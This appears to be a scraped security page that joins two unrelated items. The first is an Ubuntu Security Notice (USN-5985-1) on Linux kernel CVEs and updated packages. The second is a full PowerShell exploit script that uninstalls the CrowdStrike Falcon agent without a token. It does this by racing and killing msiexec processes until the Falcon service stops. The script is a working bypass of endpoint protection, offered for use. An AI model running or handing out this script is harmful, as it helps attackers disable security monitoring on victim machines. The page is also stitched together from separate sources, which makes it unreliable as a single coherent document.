    ==========================================================================Ubuntu Security Notice USN-5985-1March 29, 2023linux-aws-5.4, linux-azure-5.4, linux-gcp-5.4, linux-hwe-5.4,linux-ibm-5.4, linux-oracle-5.4, linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the System V IPC implementation in the Linux kerneldid not properly handle large shared memory counts. A local attacker coulduse this to cause a denial of service (memory exhaustion). (CVE-2021-3669)It was discovered that the KVM VMX implementation in the Linux kernel didnot properly handle indirect branch prediction isolation between L1 and L2VMs. An attacker in a guest VM could use this to expose sensitiveinformation from the host OS or other guest VMs. (CVE-2022-2196)Gerald Lee discovered that the USB Gadget file system implementation in theLinux kernel contained a race condition, leading to a use-after-freevulnerability in some situations. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2022-4382)It was discovered that the RNDIS USB driver in the Linux kernel containedan integer overflow vulnerability. A local attacker with physical accesscould plug in a malicious USB device to cause a denial of service (systemcrash) or possibly execute arbitrary code. (CVE-2023-23559)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-5.4.0-1046-ibm      5.4.0-1046.51~18.04.1   linux-image-5.4.0-1082-raspi    5.4.0-1082.93~18.04.1   linux-image-5.4.0-1098-oracle   5.4.0-1098.107~18.04.1   linux-image-5.4.0-1099-aws      5.4.0-1099.107~18.04.1   linux-image-5.4.0-1102-gcp      5.4.0-1102.111~18.04.2   linux-image-5.4.0-1105-azure    5.4.0-1105.111~18.04.1   linux-image-5.4.0-146-generic   5.4.0-146.163~18.04.1   linux-image-5.4.0-146-generic-lpae  5.4.0-146.163~18.04.1   linux-image-5.4.0-146-lowlatency  5.4.0-146.163~18.04.1   linux-image-aws                 5.4.0.1099.77   linux-image-azure               5.4.0.1105.78   linux-image-gcp                 5.4.0.1102.78   linux-image-generic-hwe-18.04   5.4.0.146.163~18.04.117   linux-image-generic-lpae-hwe-18.04  5.4.0.146.163~18.04.117   linux-image-ibm                 5.4.0.1046.57   linux-image-lowlatency-hwe-18.04  5.4.0.146.163~18.04.117   linux-image-oem                 5.4.0.146.163~18.04.117   linux-image-oem-osp1            5.4.0.146.163~18.04.117   linux-image-oracle              5.4.0.1098.107~18.04.70   linux-image-raspi-hwe-18.04     5.4.0.1082.79   linux-image-snapdragon-hwe-18.04  5.4.0.146.163~18.04.117   linux-image-virtual-hwe-18.04   5.4.0.146.163~18.04.117After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5985-1   CVE-2021-3669, CVE-2022-2196, CVE-2022-4382, CVE-2023-23559Package Information:   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1099.107~18.04.1   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1105.111~18.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1102.111~18.04.2   https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-146.163~18.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1046.51~18.04.1   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1098.107~18.04.1   https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1082.93~18.04.1

Ubuntu Security Notice USN-5985-1

CrowdStrike Falcon Agent version 6.44.15806 has an uninstall bypass flaw that works without an installation token.

    # Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token # Date: 30/11/2022 # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) # Vendor Homepage: https://www.crowdstrike.com/ # Author Homepage: https://www.deda.cloud/ # Tested On: All Windows versions # Version: 6.44.15806 # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"foreach($obj in $InstalledSoftware){    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))    {        $uninstall_uuid = $obj.Name.Split("\")[6]    }}$g_msiexec_instances = New-Object System.Collections.ArrayListWrite-Host "[+] Identified installed Falcon: $uninstall_uuid"Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"while($true){  if (get-process -Name "CSFalconService") {    Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {            if (-Not $g_msiexec_instances.contains($_.id)){        $g_msiexec_instances.Add($_.id)        if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){          Start-Sleep -Milliseconds 100          Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]          stop-process -Force -Id $g_msiexec_instances[-1]                }      }        }  } else {     Write-Host "[+] CSFalconService process vanished...reboot and have fun!"    break  }}

Tag

#microsoft